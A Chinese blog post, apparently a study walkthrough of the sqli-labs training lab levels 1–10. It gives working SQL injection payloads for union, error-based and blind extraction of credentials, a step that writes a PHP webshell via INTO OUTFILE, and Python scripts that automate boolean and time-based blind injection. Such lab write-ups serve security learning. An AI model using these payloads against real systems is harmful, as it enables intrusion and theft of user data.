复现一下最近学习的漏洞(sqlab 1-10)

最新推荐文章于 2024-09-10 17:22:42 发布
最新推荐文章于 2024-09-10 17:22:42 发布
阅读量649 收藏 13
点赞数 15
文章标签: 学习 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66993332/article/details/140930061
版权

第一个问题:为什么不能用#来闭合单引号呢?

在进行URL地址栏传参的时候,是有一套编码规范的。他不会编码英文、数字和某些符号。但是#它会进行编码。也就是%23。(先转ascii码,然后再转十六进制,之后加上%就是%23)

第二个问题:为什么可以使用--+来进行闭合?

sqli-lab第一关

先判断是否存在sql注入。输入的id的值不同页面会发生变化。 

然后再判断sql语句是否拼接,是字符型还是数字型:很明显这里是数字型注入,用 ‘ 进行闭合

联合注入:

可以使用order by 来找出该表的列数:第四列报错了,而第三列没有报错,说明该表有三列。

爆出数据库名和版本号:

爆出表名:

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

 爆出列名:现在我们就知道了security库下的users表中,有id,username,password这三个列名,我们直接进行查询即可

?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name ='users' --+

 最后我们就可以直接进行查询了:

?id=-1' union select 1,database(),group_concat(username,password) from users --+;

MySQL中有这样五个数据库:

information_schema, challenges, mysql, performance_schema, sys。这里我们先重点关注information_schema这张表。 

table_schema 所有的数据库名
table_name 所有库下的所有表名
column_name 所有表下的所有列名

#这里我先在本地的MySQL中的information_schema库中,进行一个查询。
select table_name from tables where table_schema = 'security';
select column_name from columns where column_schema='security' and table_name='users';
select username,password from security.users;

 最终也是可以查到security库中users表的数据的。

sqli-lab第二关

首先我们还是基本操作,先判断类型,这里我们闭合之后,发现还是报错,说明这是一个数字型。

所以这里我们就不用加 ’ 和 --+ 了,直接进行注入即可。

具体步骤和第一关相同,这里就不多说了。

sqli-lab第三关

输入?id=1'的时,查看页面报错信息。可推断出sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。

后续步骤同前两关相同。

sqli-lab第四关

这关如果输入不符合sql语法是会在页面上返回报错信息的,根据这个就可以明确知道要闭合什么符号,比如这关闭合是"),但是这关输入id=1'是不会报错,字段本身是int类型

 

最后找到合适的闭合方式,后续步骤相同。

sqli-lab第五关

第五关和前面四关不同,该关卡的查询结果不会回显。

 但报错还是会回显,这里可以使用报错注入。这里我们updatexml(),报错注入出当前的数据库名

这里因为显示子查询返回超过1行,所以说这里的数据就只有1列

报表名:爆出所有的表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) 
from information_schema.tables where table_schema='security') ,0x7e),1) --+

爆列名:

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

报字段名:

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,password)from 
users),0x7e),1) --+

这里就发现,输出的长度被限制了。这里我们可以用 substr() 这个函数来对数据进行截取。以此每32位来截取数据。

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)
from users),1,32),0x7e),1) --+

sqli-lab第六关

这一关只有闭合方式改变了一下,其余内容不变。同样是报错注入,和上一关相同

 sqli-lab第七关

还是先判断一下闭合,为‘))

在高版本的mysql中默认为NULL,就是不让导入和导出

解决办法:
在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=
在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_priv=

这里我们修改一下my.ini文件后,重启一下MySQL,就发现修改成功了。

开始注入

?id=1')) union select 1,2,"<?php phpinfo(); ?>" into outfile 
"E:\\PHPStudy\\phpstudy_pro\\WWW\\m.php"--+

这里显示有语法错误,不用管这个,直接访问webshell文件即可。这里我写的是phpinfo(),所以访问的就是php界面。

 sqli-lab第八关

第八关发现报错注入后,错误不显示了。所以报错注入和联合查询都不行了。加单引号后,报错

这里我写了一个python的脚本来跑数据库名(二分查找效率更快),最后也是成功跑出表名。后面就可以使用类似的方法来跑列名和字段名了。

import requests

url = 'http://sqli/Less-8/'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(), %d, 1)) > %d -- " % (i, mid)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high)//2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)

sqli-lab第九关

发现这关不管正确还是失败,都不会显示

 采用时间盲注,来寻找注入点

这里还是写python脚本来跑,和第八关类似,但需要稍作修改。因为此时的页面是不会变化的,所以就根据时间的特征来进行判断,修改一下pyload,然后增加一个时间模块即可。最后就能跑出数据库名。

import requests
import time

url = 'http://sqli/Less-9/'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high)//2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)

 sqli-lab第十关

第十关的闭合方式和第九关稍有不同,第十关用的 “ 来闭合,修改一下pyload即可,其余操作和第九关相同。

Healer。。
关注
  • 15
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漫漫SQL lab学习路 less-2篇
netsecure的博客
01-06 327
less 2: 有了less 1 的基础,我们就直接进入正题 输入?id=1’ 报错 输入?id=1 and 1=1正常显示 输入?id=1 and 1=2 报错 说明这是一个整数型的注入漏洞 有了less 1的铺垫我们就不用order by猜列数了 爆表名: 1 and 1=2 union select 1,2,group_concat(table_name) from information_...
使用sqlmap破解盲注漏洞
liver100day的博客
04-17 1788
使用aqlmap破解盲注漏洞 1.sqlmap介绍 sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。sqlmap渗透测试神器,需要python,在kali中集成了,可以直接使用。 2.实验环境准备 1.攻击机kali IP地址:192.168.219.129,kali内集成有sqlmap 2.具有SQL盲注漏洞web网页,但是和k
sqlab-less1
weixin_51558394的博客
03-24 5357
查看user列的password id=-1%27 union select 1,2, group -contact(username,’:’,password) from security.users --+ 需要记住的一些点--+相当于空格注释后面的 %23 相当于# %20相当于空格 %27相当‘ 有数据库基础应知道 Select 列名 from 表名 Order by 排序 Goup by 作用于属性也就是表中某列 需要重点关注的三张表: 1、schemata——schema..
sqlab靶场+免杀入门(1)
2401_84969340的博客
05-13 917
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
iwebsec靶场 SQL注入漏洞通关笔记13-二次注入
mooyuan的博客
12-03 2340
打开靶场,url为如下所示是一个注册界面,参数为用户名、密码和邮箱,源码猜测是SQL insert语句,将其插入到数据库的某个表中。点击通过邮箱找回密码进入如下界面,根据功能应该是通过邮箱找到用户名和密码,并展示出来SQL二次注入主要分析几个内容(1)注入点是什么?iwebsec的第13关关卡的注入点为username(2)注入点闭合方式与注入?这部分是普通的字符型注入,闭合方式为单引号(3)是否满足二次注入?很明显通过源码分析符合二次注入条件。
sqlab记录
个人笔记
08-16 417
欢迎大家交流,相互学习进步。 说明:sql注入一般步骤 -判断注入类型 -检测是否被过滤 -找绕过方式 -测试字段数 -获取当前数据库版本信息系,用户信息,数据库信息 -查库,查表, 查字段 注:所有的注入方式都不唯一,大家可基于此发散思维。 SQL注入1.GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入 1.GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入 直接加
sqlab靶场+免杀入门
2401_84969389的博客
05-13 993
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
sqlab靶场+免杀入门(2)
2401_84969363的博客
05-13 679
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL-Labs靶场“34-35”关通关教程
钟言的博客
03-18 2576
本篇为SQL-Labs靶场的34到35关教程,详细内容包含了:34关 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35关 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
sqlab
03-14
实验室:显示纽约市开放数据 目标 在本实验中,您将构建一个界面来显示NYC Open Data。 设置 使用git clone克隆此存储库 cd进入项目文件夹 npm install npm start 实验室 ...请按照的“获取应用程序令牌”部分中的说明...
数据库产品介绍(1).ppt
11-21
1. **Toad**:Toad是世界知名的数据管理工具,尤其在Oracle开发者中广受欢迎。它提供了图形化的界面,便于浏览和管理数据库对象。其强大的SQL编辑器拥有多种便捷功能,能显著提高开发效率。Toad还支持标签页模式,让...
qmt量化交易策略小白学习笔记第61期【qmt编程之期权行情数据--get_market_data_ex函数】
fanglue3705的博客
09-09 570
获取期权行情数据 获取期权最新数据,首先需要进行数据订阅。完成合约订阅后,用get_market_data_ex函数即可提取相关信息。这个过程包含两大步骤: 第一,通过订阅操作确保能接收到你感兴趣的期权合约的更新; 第二,调用get_market_data_ex函数来实际获取并处理这些订阅到的数据,如果需要用到历史数据或过期合约数据,需要使用download_history_data进行下载。
区块链学习笔记2--区块链技术的形成 以太坊
最新发布
weixin_61074128的博客
09-10 216
以太坊的定义:以太坊是运行在一个计算机网络中的软件,他确保数据以及智能合约的小程序可以在没有宗信协调者的情况下,被所有网络中的计算机复制和处理。以太坊的改进: 交易速度加快;pow+pos算法,逐步向pos算法过渡;智能合约:不受人为因素影响,没有黑幕;比特币的出现让经济贸易变得简单,而比特币系统的不足,也同样被人诟病。于是出现了致力解决比特币不足的“V神”。以太坊的愿景是创建一个无法停止,抗屏蔽(审查)和自我维持的去中心化世界计算机。比特币的不足:交易速度慢;仅仅完成了货币的去中心化。
sheng的学习笔记-AI-规则学习(rule learning)
coldstarry的专栏
09-09 817
机器学习中的“规则”(rule)通常是指语义明确、能描述数据分布所隐含的客观规律或领域概念、可写成“若……,则……”形式的逻辑规则。​“规则学习”(rule learning)是从训练数据中学习出一组能用于对未见示例进行判别的规则。一条规则形如:在数理逻辑中“文字”专指原子公式(atom)及其否定。与神经网络、支持向量机这样的“黑箱模型”相比,规则学习具有更好的可解释性,能使用户更直观地对判别过程有所了解。另一方面,数理逻辑具有极强的表达能力,绝大多数人类知识都能通过数理逻辑进行简洁的刻画和表达。
Android Fragment 学习备忘
sdaujz的博客
09-08 372
1.fragment的动态添加与管理:
学习笔记】SSL证书之前向保密
Taki_UP的博客
09-10 479
本篇介绍了密码学中前向保密(Forward Secrecy)的相关内容
9.6学习记录+三场笔试
m0_62956971的博客
09-07 1148
短作业优先。
EmguCV学习笔记 C# 第10章 人脸识别
UruseiBest 的技术专栏
09-05 585
EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。10.1 人脸检测 CascadeClassifier类。10.2.2.1 EigenFaceRecgnizer类。10.2.1 LBPHFaceRecgnizer类。10.2 人脸识别 FaceRecgnizer类。教程配套文件及相关说明。
某轿车车内噪声测试试验:NVH性能解析与数据分析
图3-1和3-2展示了具体的测点布置。此外,论文还引用了韩晓峰关于汽车NVH试验方法的硕士论文,进一步探讨了NVH试验的多种方法和技术,强调了试验的规范性和原创性声明,以及学位论文的版权使用授权问题。 这篇摘要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值